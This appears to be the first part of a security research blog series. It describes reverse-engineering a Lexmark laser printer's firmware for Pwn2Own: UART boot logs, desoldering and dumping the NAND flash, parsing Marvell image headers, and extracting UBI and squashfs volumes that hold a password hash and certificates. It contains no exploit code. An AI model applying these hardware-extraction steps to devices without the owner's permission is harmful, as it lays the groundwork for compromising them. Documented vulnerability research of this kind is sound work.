The main printed circuit board (PCB) is located on the left side of the printer. The device is powered by a Marvell 88PA6220-BUX2 System-on-Chip (SoC) which is specially designed for the printer industry and a Micron MT29F2G08ABAGA NAND flash (2Gb i.e. 256MB) for firmware storage. The NAND flash can be easily located on the lower left side of the PCB:

Serial output

The UART connector, labeled JRIP1 on the PCB, was quickly identified:

Three wires were soldered with the intent to:

  • review the boot log to understand the flash layout by observing the device’s partition information
  • scan the boot log for any indications that software signature verification is performed by the printer
  • hope to get a shell in either the bootloader (U-Boot) or the OS (Linux)

The serial output (115200 baud) of the printer’s boot process is shown below:

Si Ge2-RevB 3.3.22-9h 12 14 25
TIME=Tue Mar 10 21:02:36 2020;COMMIT=863d60b
uidc
Failure Enabling AVS workaround on 88PG870
setting AVS Voltage to 1050
Bank5 Reg2 = 0x0000381E, VoltBin = 0, efuseEscape = 0
AVS efuse Values:
Efuse Programed = 1
Low VDD Limit = 32
High VDD Limit = 32
Target DRO = 65535
Select Vsense0 = 0
a
Calling Configure_Flashes @ 0xFFE010A8 12 FE 13 E0026800
fves
DDR3 400MHz 1x16 4Gbit
rSHA compare Passed 0
SHA compare Passed 0
l
Launch AP Core0 @ 0x00100000
U-Boot 2018.07-AUTOINC+761a3261e9 (Feb 28 2020 - 23:26:43 +0000)
DRAM: 512 MiB
NAND: 256 MiB
MMC: mv_sdh: 0, mv_sdh: 1, mv_sdh: 2
lxk_gen2_eeprom_probe:123: No panel eeprom option found.
lxk_panel_notouch_probe_gen2:283: panel uicc type 68, hw vers 19, panel id 98, display type 11, firmware v4.5, lvds 4
found smpn display TM024HDH49 / ILI9341 default
lcd_lvds_pll_init: Requesting dotclk=40000000Hz
found smpn display Yeebo 2.8 B
ubi0: default fastmap pool size: 100
ubi0: default fastmap WL pool size: 50
ubi0: attaching mtd1
ubi0: attached by fastmap
ubi0: fastmap pool size: 100
ubi0: fastmap WL pool size: 50
ubi0: attached mtd1 (name "mtd=1", size 253 MiB)
ubi0: PEB size: 131072 bytes (128 KiB), LEB size: 126976 bytes
ubi0: min./max. I/O unit sizes: 2048/2048, sub-page size 2048
ubi0: VID header offset: 2048 (aligned 2048), data offset: 4096
ubi0: good PEBs: 2018, bad PEBs: 8, corrupted PEBs: 0
ubi0: user volume: 7, internal volumes: 1, max. volumes count: 128
ubi0: max/mean erase counter: 2/1, WL threshold: 4096, image sequence number: 0
ubi0: available PEBs: 0, total reserved PEBs: 2018, PEBs reserved for bad PEB handling: 32
Loading file '/shared/pm/softoff' to addr 0x1f6545d4...
Unmounting UBIFS volume InternalStorage!
Card did not respond to voltage select!
bootcmd: setenv cramfsaddr 0x1e900000;ubi read 0x1e900000 Kernel 0xa67208;sha256verify 0x1e900000 0x1f367000 1;cramfsload 0x100000 /main.img;source 0x100000;loop.l 0xd0000000 1
Read 10908168 bytes from volume Kernel to 1e900000
Code authentication success
### CRAMFS load complete: 2165 bytes loaded to 0x100000
## Executing script at 00100000
### CRAMFS load complete: 4773416 bytes loaded to 0xa00000
### CRAMFS load complete: 4331046 bytes loaded to 0x1600000
## Booting kernel from Legacy Image at 00a00000 ...
Image Name: Linux-4.17.19-yocto-standard-74b
Image Type: ARM Linux Kernel Image (uncompressed)
Data Size: 4773352 Bytes = 4.6 MiB
Load Address: 00008000
Entry Point: 00008000
## Loading init Ramdisk from Legacy Image at 01600000 ...
Image Name: initramfs-image-granite2-2020063
Image Type: ARM Linux RAMDisk Image (uncompressed)
Data Size: 4330982 Bytes = 4.1 MiB
Load Address: 00000000
Entry Point: 00000000
## Flattened Device Tree blob at 01500000
Booting using the fdt blob at 0x1500000
Loading Kernel Image ... OK
Using Device Tree in place at 01500000, end 01516aff
UPDATING DEVICE TREE WITH st:1fec4000 sz: 12c000
Starting kernel ...
Booting Linux on physical CPU 0xffff00
Linux version 4.17.19-yocto-standard-74b7175b2a3452f756ffa76f750e50db ([email protected]) (gcc version 7.3.0 (GCC)) #1 SMP PREEMPT Mon Jun 29 19:46:01 UTC 2020
CPU: ARMv7 Processor [410fd034] revision 4 (ARMv7), cr=30c5383d
CPU: div instructions available: patching division code
CPU: PIPT / VIPT nonaliasing data cache, VIPT aliasing instruction cache
OF: fdt: Machine model: mv6220 Lionfish 00d L
earlycon: early_pxa0 at MMIO32 0x00000000d4030000 (options '')
bootconsole [early_pxa0] enabled
FIX ignoring exception 0xa11 addr=fb7ffffe swapper/0:1
...

On other devices NCC Group has reviewed in the past, access to the UART pins sometimes offered a full Linux shell. On the MC3224i the UART RX pin did not appear to be enabled, so we were only able to view the boot log, not interact with the system. It may be that the pin is disabled through e-fuses on the SoC. Alternatively, a zero-ohm resistor may have been removed from the PCB on production devices, in which case it may be possible to re-enable it. Since our main goal was to remove the flash and extract the firmware, we did not investigate this further.

Dumping the firmware from the flash

Removing and dumping (or reprogramming) flash memory is a lot easier to accomplish than most people realize, and the benefits are great: it often allows us to enable debugging, obtain access to a shell, read sensitive keys, and in some cases bypass firmware signature verification. In our case, though, the goal was to extract the file system and reverse-engineer the binaries, as the Pwn2Own rules clearly specified that only remotely executed exploits were acceptable. Still, there are no restrictions placed on the exploit development effort. It is important to think of the development and execution of the exploit as separate efforts. While the execution effort dictates the scalability of an attack and its cost to the attacker, the development effort (or NRE) need only be expended once for success, and so may reasonably consume sacrificial devices and a great deal of time without affecting the execution effort. It is the defender’s job to increase the execution effort.

Removing the flash was straightforward using a hot air rework station. After cleaning the pins we used a TNM5000 programmer with a TSOP-48 adapter to read the contents of the flash. We ensured the flash memory was properly seated in the adapter, selected the correct flash identifier, then read the full contents of the flash and saved them to a file. Re-attaching the flash needs to be done carefully to ensure a functional device. The entire process took about an hour, including testing the connections under a microscope. The printer booted successfully, hooray! The easy part was done…

The dumped flash image is exactly 285,212,672 bytes long, more than the 268,435,456 bytes of the flash’s nominal 256MB. This is because the raw read of the flash includes spare areas, also referred to as page OOB (out-of-band) data areas. From the Micron datasheet:

Internal ECC enables 9-bit detection and 8-bit correction in 528 bytes (x8) of main area and 16 bytes (x8) of spare area. […]
During a PROGRAM operation, the device calculates an ECC code on the 2k page in the cache register, before the page is written to the NAND Flash array. The ECC code is stored in the spare area of the page.
During a READ operation, the page data is read from the array to the cache register, where the ECC code is calculated and compared with the ECC code value read from the array. If a 1- to 8-bit error is detected, the error is corrected in the cache register. Only corrected data is output on the I/O bus.

The NAND flash memory is programmed and read using a page-based granularity. A page is made up of 2048 bytes of usable storage space and 128 bytes of OOB used to store the error correction codes and flags for bad block management, for a total of 2,176 bytes.
The erase operation has block-based granularity. According to Micron’s documentation, for this flash part one block is made up of 64 pages, for a total of 128KB of usable data.
The flash has two planes, each containing 1024 blocks. Putting everything together:

2 planes * 1024 blocks/plane * 64 pages/block * (2048 + 128) bytes/page = 285,212,672

Since the spare area is only required for flash-management use and does not contain useful user data, we wrote a small script that drops the 128 bytes of OOB data after each 2048-byte page. The resulting file is exactly 256MB.
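Our script was equivalent in spirit to the following Go sketch (the input and output file names are illustrative):

package main

import (
	"log"
	"os"
)

const (
	pageSize = 2048 // usable bytes per page
	oobSize  = 128  // spare (OOB) bytes per page
)

func main() {
	raw, err := os.ReadFile("flash_dump_raw.bin")
	if err != nil {
		log.Fatal(err)
	}
	out := make([]byte, 0, len(raw)/(pageSize+oobSize)*pageSize)
	// Keep the 2048 usable bytes of each page, drop the 128 OOB bytes.
	for off := 0; off+pageSize <= len(raw); off += pageSize + oobSize {
		out = append(out, raw[off:off+pageSize]...)
	}
	if err := os.WriteFile("flash_dump.bin", out, 0644); err != nil {
		log.Fatal(err)
	}
}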

Analyzing the dumped firmware

Extracting the Marvell images

Remember we said the printer is powered by a Marvell chipset? This is when that information comes in handy. While the 88PA6220 was specially designed for the printer industry, the firmware image format looks to be identical to that of other Marvell SoCs. As such, there are many documents for similar processors, and code on GitHub, that can be used as reference. For instance, we see that the image starts with a TIM (Trusted Image Module) header. The header contains a great deal of information about the other images, some of which we used to extract the individual images, as we shall see in this section of the blog:

The TIM header format is presented below, ending with the top-level TIM structure (parsing obviously assumes the OOB data has already been removed):

typedef struct {
    unsigned int Version;
    unsigned int Identifier;
    unsigned int Trusted;
    unsigned int IssueDate;
    unsigned int OEMUniqueID;
} VERSION_I;

typedef struct {
    unsigned int Reserved[5];
    unsigned int BootFlashSign;
} FLASH_I, *pFLASH_I;

// Constant part of the header
typedef struct {
    VERSION_I VersionBind;
    FLASH_I FlashInfo;
    unsigned int NumImages;
    unsigned int NumKeys;
    unsigned int SizeOfReserved;
} CTIM, *pCTIM;

typedef struct {
    uint32_t ImageID;                  // Indicates which image
    uint32_t NextImageID;              // Indicates next image in the chain
    uint32_t FlashEntryAddr;           // Block numbers for NAND
    uint32_t LoadAddr;
    uint32_t ImageSize;
    uint32_t ImageSizeToHash;
    HASHALGORITHMID_T HashAlgorithmID; // See HASHALGORITHMID_T
    uint32_t Hash[16];                 // Reserve 512 bits for the hash
    uint32_t PartitionNumber;
} IMAGE_INFO_3_4_0, *pIMAGE_INFO_3_4_0; // 0x60 bytes

typedef struct {
    unsigned int KeyID;
    unsigned int HashAlgorithmID;
    unsigned int ModulusSize;
    unsigned int PublicKeySize;
    unsigned int RSAPublicExponent[64];
    unsigned int RSAModulus[64];
    unsigned int KeyHash[8];
} KEY_MOD, *pKEY_MOD;

typedef struct {
    pCTIM pConsTIM;           // Constant part
    pIMAGE_INFO_3_4_0 pImg;   // Pointer to images (v 3.4.0)
    pKEY_MOD pKey;            // Pointer to keys
    unsigned int *pReserved;  // Pointer to reserved area
    pPLAT_DS pTBTIM_DS;       // Pointer to digital signature
} TIM;

As detailed below, the processor was secured by the Lexmark team, so let’s take a look at some of the relevant fields that help us extract the images; a minimal parsing sketch follows the list. For a complete description of each field please refer to this Reference Manual:

  • VERSION_I – general TIM header information.
    • Version (0x00030400) – TIM header version (3.4.0). This is useful later to identify which version of Image Info structure (IMAGE_INFO_3_4_0) is used.
    • Identifier (0x54494D48) – always ASCII "TIMH", a constant string used to identify a valid header.
    • Trusted (0x00000001) – 0 for insecure processors, 1 for secure. The processor has been secured by Lexmark therefore only signed firmware is allowed to run on these devices.
  • FLASH_I – boot flash properties.
  • NumImages (0x00000004) – indicates there are four structures in the header that describe images making up the firmware.
  • NumKeys (0x00000001) – one key information structure is present in this header.
  • SizeOfReserved (0x00000000) – just before the signature at the end of the TIM header, the OEM can reserve up to 4KB – sizeof(TIMH) for their use. Lexmark is not using this feature.
  • IMAGE_INFO_3_4_0 – image 1 information.
    • ImageID (0x54494D48) – id of image ("TIMH"), TIM header in this case.
    • NextImageID (0x4F424D49) – id of following image ("OBMI"), OEM Boot Module Image.
    • FlashEntryAddr (0x00000000) – index in flash memory where the TIM header is located.
    • ImageSize (0x00000738) – the size of the image, 1,848 bytes for the header.
  • IMAGE_INFO_3_4_0 – image 2 information.
    • ImageID (0x4F424D49) – id of image ("OBMI"), OEM Boot Module Image. Provided by Marvell, the OBM is responsible for the early tasks needed to boot the printer: everything in the UART boot log before the U-Boot start message is printed by the OBM code. The OBM sets up the DDR and the Application Processor Core 0, and performs signature verification of the firmware loaded next (U-Boot).
    • NextImageID (0x4F534C4F) – id of following image ("OSLO").
    • FlashEntryAddr (0x00001000) – index in flash memory where OBMI is located.
    • ImageSize (0x0000FD40) – the size of the image, 64,832 bytes for OBMI.
  • IMAGE_INFO_3_4_0 – image 3 information.
    • ImageID (0x4F534C4F) – id of image ("OSLO"), contains U-Boot code.
    • NextImageID (0x54524458) – id of following image ("TRDX").
    • FlashEntryAddr (0x000C0000) – index in flash memory where OSLO image is located.
    • ImageSize (0x000712FF) – the size of the image, 463,615 bytes for OSLO.
  • IMAGE_INFO_3_4_0 – image 4 information.
    • ImageID (0x54524458) – id of image ("TRDX"), contains Linux kernel and device tree image (likely used for recovery).
    • NextImageID (0xFFFFFFFF) – id of following image, this value signals no more images are following.
    • FlashEntryAddr (0x00132000) – index in flash memory where TRDX image is located.
    • ImageSize (0x000E8838) – the size of the image, 952,376 bytes for TRDX.
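Putting these fields together, the images can be carved with a minimal sketch such as the Go program below; it assumes a little-endian layout, treats FlashEntryAddr as a byte offset into the OOB-stripped dump (as the values above suggest), and uses illustrative file names:

package main

import (
	"encoding/binary"
	"fmt"
	"log"
	"os"
)

const (
	ctimSize      = 56 // VERSION_I (20) + FLASH_I (24) + NumImages/NumKeys/SizeOfReserved (12)
	imageInfoSize = 96 // sizeof(IMAGE_INFO_3_4_0), 0x60 bytes
)

func main() {
	dump, err := os.ReadFile("flash_dump.bin")
	if err != nil {
		log.Fatal(err)
	}
	numImages := binary.LittleEndian.Uint32(dump[44:]) // CTIM.NumImages
	for i := 0; i < int(numImages); i++ {
		entry := dump[ctimSize+i*imageInfoSize:]
		id := binary.LittleEndian.Uint32(entry[0:])        // ImageID, e.g. "TIMH"
		flashAddr := binary.LittleEndian.Uint32(entry[8:]) // FlashEntryAddr
		size := binary.LittleEndian.Uint32(entry[16:])     // ImageSize
		name := string([]byte{byte(id >> 24), byte(id >> 16), byte(id >> 8), byte(id)})
		fmt.Printf("%s @ 0x%08X, %d bytes\n", name, flashAddr, size)
		if err := os.WriteFile(name+".bin", dump[flashAddr:flashAddr+size], 0644); err != nil {
			log.Fatal(err)
		}
	}
}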

Of course, these Marvell images make up only a small fraction of the flash. Looking past them, we recognized the UBI erase block signature "UBI#" showing up every 131,072 bytes, i.e. 128KB, i.e. every flash block (1 block * 64 pages/block * 2048 bytes/page). In total there were 2,024 UBI blocks, which we carved into a file (we named it ubi_data.bin) that is 253MB in size; a minimal carving sketch is shown below.
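The carving itself can be as simple as the following Go sketch (file names illustrative): keep every 128KB erase block that begins with the "UBI#" magic:

package main

import (
	"bytes"
	"log"
	"os"
)

const blockSize = 64 * 2048 // 64 pages of 2048 usable bytes = 128KB per erase block

func main() {
	dump, err := os.ReadFile("flash_dump.bin")
	if err != nil {
		log.Fatal(err)
	}
	var ubi []byte
	for off := 0; off+blockSize <= len(dump); off += blockSize {
		if bytes.HasPrefix(dump[off:], []byte("UBI#")) {
			ubi = append(ubi, dump[off:off+blockSize]...)
		}
	}
	if err := os.WriteFile("ubi_data.bin", ubi, 0644); err != nil {
		log.Fatal(err)
	}
}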

$ file ubi_data.bin 
ubi_data.bin: UBI image, version 1

We expect this file to contain the interesting material we are after.

Extracting the UBI volumes

Ok, so we have a UBI image (named ubi_data.bin) that contains all the UBI blocks:

What now? First a bit more about UBI…
The first four bytes of the first page of each erase block start with "UBI#", as mentioned above. This shows that the first page is occupied by the erase count header, which contains statistics used for wear-levelling operations. If the block contains user data, the second page in the block is occupied by the volume header (which starts with "UBI!"). As the first two pages of each block contain metadata, only 62 of the 64 pages (124KB) store user data, a little less than the expected 128KB.

Let’s see what’s inside using the ubi_reader tools:

  • 2024 erase blocks
  • 1302 blocks used for data (part of a volume), which is the block count summed over all volumes
  • seven volumes: Kernel, Base, Copyright, Engine, InternalStorage, MBR, ManBlock

$ ubireader_display_info ubi_data.bin 
UBI File
---------------------
	Min I/O: 2048
	LEB Size: 126976
	PEB Size: 131072
	Total Block Count: 2024
	Data Block Count: 1302
	Layout Block Count: 2
	Internal Volume Block Count: 1
	Unknown Block Count: 719
	First UBI PEB Number: 2.0

	Image: 0
	---------------------
		Image Sequence Num: 0
		Volume Name:Kernel
		Volume Name:Base
		Volume Name:Copyright
		Volume Name:Engine
		Volume Name:InternalStorage
		Volume Name:MBR
		Volume Name:ManBlock
		PEB Range: 0 - 2023

		Volume: Kernel
		---------------------
			Vol ID: 2
			Name: Kernel
			Block Count: 95

			Volume Record
			---------------------
				alignment: 1
				crc: '0x8abc33f6'
				data_pad: 0
				errors: ''
				flags: 0
				name: 'Kernel'
				name_len: 6
				padding: '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
				rec_index: 2
				reserved_pebs: 133
				upd_marker: 0
				vol_type: 'dynamic'

		Volume: Base
		---------------------
			Vol ID: 3
			Name: Base
			Block Count: 927

			Volume Record
			---------------------
				alignment: 1
				crc: '0xc3f30751'
				data_pad: 0
				errors: ''
				flags: 0
				name: 'Base'
				name_len: 4
				padding: '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
				rec_index: 3
				reserved_pebs: 1132
				upd_marker: 0
				vol_type: 'dynamic'

		Volume: Copyright
		---------------------
			Vol ID: 4
			Name: Copyright
			Block Count: 1

			Volume Record
			---------------------
				alignment: 1
				crc: '0xa065ca'
				data_pad: 0
				errors: ''
				flags: 0
				name: 'Copyright'
				name_len: 9
				padding: '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
				rec_index: 4
				reserved_pebs: 3
				upd_marker: 0
				vol_type: 'dynamic'

		Volume: Engine
		---------------------
			Vol ID: 15
			Name: Engine
			Block Count: 21

			Volume Record
			---------------------
				alignment: 1
				crc: '0x66c80b4b'
				data_pad: 0
				errors: ''
				flags: 0
				name: 'Engine'
				name_len: 6
				padding: '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
				rec_index: 15
				reserved_pebs: 34
				upd_marker: 0
				vol_type: 'dynamic'

		Volume: InternalStorage
		---------------------
			Vol ID: 24
			Name: InternalStorage
			Block Count: 256

			Volume Record
			---------------------
				alignment: 1
				crc: '0x962ca517'
				data_pad: 0
				errors: ''
				flags: 0
				name: 'InternalStorage'
				name_len: 15
				padding: '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
				rec_index: 24
				reserved_pebs: 674
				upd_marker: 0
				vol_type: 'dynamic'

		Volume: MBR
		---------------------
			Vol ID: 90
			Name: MBR
			Block Count: 1

			Volume Record
			---------------------
				alignment: 1
				crc: '0x5fee82ff'
				data_pad: 0
				errors: ''
				flags: 0
				name: 'MBR'
				name_len: 3
				padding: '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
				rec_index: 90
				reserved_pebs: 2
				upd_marker: 0
				vol_type: 'static'

		Volume: ManBlock
		---------------------
			Vol ID: 91
			Name: ManBlock
			Block Count: 1

			Volume Record
			---------------------
				alignment: 1
				crc: '0x28cd6521'
				data_pad: 0
				errors: ''
				flags: 0
				name: 'ManBlock'
				name_len: 8
				padding: '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
				rec_index: 91
				reserved_pebs: 2
				upd_marker: 0
				vol_type: 'static'

Ok, now to extract the seven volumes mentioned above into the ubi_data_bin_extracted folder:

$ ubireader_extract_images ubi_data.bin -v -o ubi_data_bin_extracted
$ ls -lh ubi_data_bin_extracted/ubi_data.bin/
-rw-rw-r-- 1 cvisinescu cvisinescu 113M Jan 17 19:10 img-0_vol-Base.ubifs
-rw-rw-r-- 1 cvisinescu cvisinescu 124K Jan 17 19:10 img-0_vol-Copyright.ubifs
-rw-rw-r-- 1 cvisinescu cvisinescu 2.6M Jan 17 19:10 img-0_vol-Engine.ubifs
-rw-rw-r-- 1 cvisinescu cvisinescu  49M Jan 17 19:10 img-0_vol-InternalStorage.ubifs
-rw-rw-r-- 1 cvisinescu cvisinescu  12M Jan 17 19:10 img-0_vol-Kernel.ubifs
-rw-rw-r-- 1 cvisinescu cvisinescu 124K Jan 17 19:10 img-0_vol-ManBlock.ubifs
-rw-rw-r-- 1 cvisinescu cvisinescu 124K Jan 17 19:10 img-0_vol-MBR.ubifs

The volumes represent partitions used by the device, some of which are file systems:

$ file *.ubifs
img-0_vol-Base.ubifs:            Squashfs filesystem, little endian, version 1024.0, compressed, 4280940851934265344 bytes, -1506476032 inodes, blocksize: 512 bytes, created: Sun Nov  5 14:27:44 2034
img-0_vol-Copyright.ubifs:       data
img-0_vol-Engine.ubifs:          Squashfs filesystem, little endian, version 1024.0, compressed, 7678397671131840512 bytes, 1610612736 inodes, blocksize: 512 bytes, created: Sat Nov 14 21:23:44 2026
img-0_vol-InternalStorage.ubifs: UBIfs image, sequence number 1, length 4096, CRC 0x44d52349
img-0_vol-Kernel.ubifs:          Linux Compressed ROM File System data, little endian size 11939840 version #2 sorted_dirs CRC 0x35eb963f, edition 0, 4424 blocks, 191 files
img-0_vol-ManBlock.ubifs:        data
img-0_vol-MBR.ubifs:             DOS/MBR boot sector; partition 1 : ID=0xff, active 0xff, start-CHS (0x3ff,255,63), end-CHS (0x3ff,255,63), startsector 4294967295, 4294967295 sectors; partition 2 : ID=0xff, active 0xff, start-CHS (0x3ff,255,63), end-CHS (0x3ff,255,63), startsector 4294967295, 4294967295 sectors; partition 3 : ID=0xff, active 0xff, start-CHS (0x3ff,255,63), end-CHS (0x3ff,255,63), startsector 4294967295, 4294967295 sectors; partition 4 : ID=0xff, active 0xff, start-CHS (0x3ff,255,63), end-CHS (0x3ff,255,63), startsector 4294967295, 65535 sectors

Accessing the user data (writable partition)

This section describes how to mount img-0_vol-InternalStorage.ubifs which is a UBIFS image. To do so, a number of steps must be performed.

We will first need to load the NAND flash simulator kernel module. This module uses RAM to imitate physical NAND flash devices. Check for the appearance of /dev/mtd0 and /dev/mtd0ro and the output of dmesg on the Linux machine after running the following command. The four ID bytes are the values returned by the READ ID flash command (0x90); they are also listed in the Micron NAND flash datasheet in the "Read ID Parameters for Address 00h" table:

$ sudo modprobe nandsim first_id_byte=0x2C second_id_byte=0xDA third_id_byte=0x90 fourth_id_byte=0x95
$ ls -l /dev/mtd*

The simulated NAND flash is 256MB and each erase block is 128KB, which matches the physical flash. Since we are only mounting one volume of 49MB, space should not be a problem:

$ cat /proc/mtd 
dev:    size   erasesize  name
mtd0: 10000000 00020000 "NAND simulator partition 0"
$ dmesg | grep "nand:"
[50027.712675] nand: device found, Manufacturer ID: 0x2c, Chip ID: 0xda
[50027.712677] nand: Micron NAND 256MiB 3,3V 8-bit
[50027.712678] nand: 256 MiB, SLC, erase size: 128 KiB, page size: 2048, OOB size: 64

Note that the OOB size reported by dmesg is 64 bytes, which is incorrect: it should be 128 bytes. However, since we are simulating the NAND flash in RAM, this is not an issue. At the time of this writing, nandsim does not support the model of Micron NAND flash used by the printer.

Next, let us erase all the blocks from start to end. For more details run flash_erase --help:

$ sudo flash_erase /dev/mtd0 0 0
Erasing 128 Kibyte @ ffe0000 -- 100 % complete

With all simulated NAND flash blocks erased, let’s format the partition. The first parameter specifies the minimum input/output unit, in our case one page. The second specifies the offset of the volume ID header, in our case 2048 bytes into the UBI erase block, as presented earlier in this section of the blog.

$ sudo ubiformat /dev/mtd0 -s 2048 -O 2048
ubiformat: mtd0 (nand), size 268435456 bytes (256.0 MiB), 2048 eraseblocks of 131072 bytes (128.0 KiB), min. I/O size 2048 bytes
libscan: scanning eraseblock 2047 -- 100 % complete  
ubiformat: 2048 eraseblocks are supposedly empty
ubiformat: formatting eraseblock 2047 -- 100 % complete

There is one more kernel module we need to load:

$ sudo modprobe ubi
$ ls -l /dev/ubi_ctrl

The following command attaches /dev/mtd0 to UBI. The first parameter indicates which MTD device (i.e. /dev/mtd0) is used. The second indicates the UBI device to be created (i.e. /dev/ubi0), which is used to access the UBI volume. The third parameter again specifies the offset of the volume ID header.

$ sudo ubiattach -m 0 -d 0 -O 2048
UBI device number 0, total 2048 LEBs (260046848 bytes, 248.0 MiB), available 2002 LEBs (254205952 bytes, 242.4 MiB), LEB size 126976 bytes (124.0 KiB)
$ ls -l /dev/ubi0

Now we create a volume, which we name my_volume_InternalStorage and access via /dev/ubi0_0 (the first volume on the device). The first command below, which tries to allocate a volume equal to the full size of the flash, fails because, as mentioned earlier, two pages per erase block are used for the UBI headers. As such, for each 128KB UBI erase block, 4KB are lost. We can however create a volume that is 240MB (i.e. 1982 erase blocks * 124KB/erase block), much larger than our img-0_vol-InternalStorage.ubifs volume which is 49MB:

$ sudo ubimkvol /dev/ubi0 -N my_volume_InternalStorage -s 256MiB
ubimkvol: error!: cannot UBI create volume
          error 28 (No space left on device)

$ sudo ubimkvol /dev/ubi0 -N my_volume_InternalStorage -s 240MiB
Volume ID 0, size 1982 LEBs (251666432 bytes, 240.0 MiB), LEB size 126976 bytes (124.0 KiB), dynamic, name "my_volume_InternalStorage", alignment 1
$ ls -l /dev/ubi0_0
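
The arithmetic can be sanity-checked in a few lines of Python, using the numbers from the ubiattach and ubimkvol output above:

PEB = 131072               # physical erase block: 128KB
LEB = PEB - 2 * 2048       # minus the two header pages = 126976 bytes (124KB)
print(2048 * LEB / 2**20)  # 248.0 MiB total, so a 256MiB volume cannot fit
print(1982 * LEB / 2**20)  # 240.0 MiB, the volume size we actually created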

Additional information about the UBI device can be obtained using ubinfo /dev/ubi0 and ubinfo /dev/ubi0_0. Now to put the extracted volume image into UBI device 0, volume 0:

$ ubiupdatevol /dev/ubi0_0 img-0_vol-InternalStorage.ubifs

Finally, we can mount the UBI device using the mount command below. Alternatively, sudo mount -t ubifs ubi0:my_volume_InternalStorage mnt/ can also be used:

$ mkdir mnt
$ sudo mount -t ubifs ubi0_0 mnt/
$ ls -l mnt/
drwxr-xr-x  2 root root  160 Mar  2  2020 bookmarkmgr
drwxr-xr-x  2 root root  232 Mar  2  2020 http
drwxr-xr-x  2 root root  400 Sep 10 15:21 iq
drwxr-xr-x  2 root root  160 Mar  2  2020 log
drwxr-xr-x  2 root root  160 Mar  2  2020 nv2
-rw-r--r--  1 root root    0 Mar  2  2020 sb-dbg
drwxr-xr-x  6 root root  424 Mar  2  2020 security
drwxr-xr-x 41 root root 2816 Mar 16  2021 shared
drwxr-xr-x  2 root root  224 Mar  2  2020 thinscan

In this file system we find data such as the following:

  • the auth database, containing the user account from when we first set up the printer (username and password hash)
  • some public certificates and encrypted private certificates
  • calibration data

To undo everything, we run the following commands:

$ sudo umount mnt/
$ sudo ubirmvol /dev/ubi0 -n 0
$ sudo ubidetach -m 0
$ sudo modprobe -r ubifs
$ sudo modprobe -r ubi
$ sudo modprobe -r nandsim

Accessing the printer binaries (read-only partition)

This section describes how to extract the content of img-0_vol-Base.ubifs, which we found holds the binaries most interesting for us to reverse engineer:

$ unsquashfs img-0_vol-Base.ubifs
$ ls -l Base_squashfs_dir
drwxr-xr-x  2 cvisinescu cvisinescu 4096 Jun 22  2021 bin
drwxr-xr-x  2 cvisinescu cvisinescu 4096 Jun 22  2021 boot
-rw-r--r--  1 cvisinescu cvisinescu  909 Jun 22  2021 Build.Info
drwxr-xr-x  2 cvisinescu cvisinescu 4096 Mar 11  2021 dev
drwxr-xr-x 53 cvisinescu cvisinescu 4096 Jun 22  2021 etc
drwxr-xr-x  6 cvisinescu cvisinescu 4096 Jun 22  2021 home
drwxr-xr-x  8 cvisinescu cvisinescu 4096 Jun 22  2021 lib
drwxr-xr-x  2 cvisinescu cvisinescu 4096 Mar 11  2021 media
drwxr-xr-x  2 cvisinescu cvisinescu 4096 Mar 11  2021 mnt
drwxr-xr-x  5 cvisinescu cvisinescu 4096 Jun 22  2021 opt
drwxr-xr-x  2 cvisinescu cvisinescu 4096 Jun 22  2021 pkg-netapps
dr-xr-xr-x  2 cvisinescu cvisinescu 4096 Mar 11  2021 proc
drwx------  4 cvisinescu cvisinescu 4096 Jun 22  2021 root
drwxr-xr-x  2 cvisinescu cvisinescu 4096 Mar 11  2021 run
drwxr-xr-x  2 cvisinescu cvisinescu 4096 Jun 22  2021 sbin
drwxr-xr-x  2 cvisinescu cvisinescu 4096 Mar 11  2021 srv
dr-xr-xr-x  2 cvisinescu cvisinescu 4096 Mar 11  2021 sys
drwxrwxrwt  2 cvisinescu cvisinescu 4096 Mar 11  2021 tmp
drwxr-xr-x 10 cvisinescu cvisinescu 4096 Apr 18  2021 usr
drwxr-xr-x 13 cvisinescu cvisinescu 4096 Mar 16  2021 var
lrwxrwxrwx  1 cvisinescu cvisinescu   14 Jun 14  2021 web -> /usr/share/web

Success… now that we have the binaries, we can begin the task of reverse engineering them to understand how the printer works, vulnerabilities included. Part 2 of this blog series will show the process used to finally compromise the printer.

Wrapping up

In summary, the image on the NAND flash memory looks as follows:

  • TIMH – Trusted Image Module header, Marvell-specific
  • OBMI – first bootloader, written by Marvell
  • OSLO – second bootloader (U-Boot)
  • TRDX – Linux kernel and device tree
  • UBI image
    • Base – squashfs filesystem for binaries
    • Copyright – raw data
    • Engine – squashfs filesystem containing some kernel modules for motors, belt, fan, etc.
    • InternalStorage – UBI FS image for user data (writable)
    • Kernel – compressed Linux kernel
    • ManBlock – raw data, empty partition
    • MBR – Master Boot Record, contains information about partitions: Base, Copyright, Engine, InternalStorage and Kernel

As a side note…

During the early days of the project, we first tried to modify parts of the firmware image (including the error correction code in the spare areas). The end goal was to perform dynamic testing on a live system and eventually obtain a shell, which we could use to dump the binaries, view running processes, review file permissions, and understand how the Lexmark firmware works in general. This required repeated programming of the flash. While we could reliably re-attach the flash on the PCB multiple times, each attempt carries a risk of damage to both the chip and the PCB pads on which it is mounted.
Ordering replacement flash parts from the common vendors was not an option due to chip shortages. As such, we attempted to create a contraption that would help us use the TSOP-48 adapter directly, basically a poor man’s chip socket.

The connections were good, but the device would not boot past U-Boot (as observed over serial) for reasons we did not understand:

Si Ge2-RevB 3.3.22-9h 12 14 25
TIME=Tue Jun 08 20:32:27 2021;COMMIT=863d60b
uidc
Failure Enabling AVS workaround on 88PG870
setting AVS Voltage to 1050
Bank5 Reg2 = 0x000038E4, VoltBin = 0, efuseEscape = 0
AVS efuse Values:
Efuse Programed = 1
Low VDD Limit = 31
High VDD Limit = 31
Target DRO = 65535
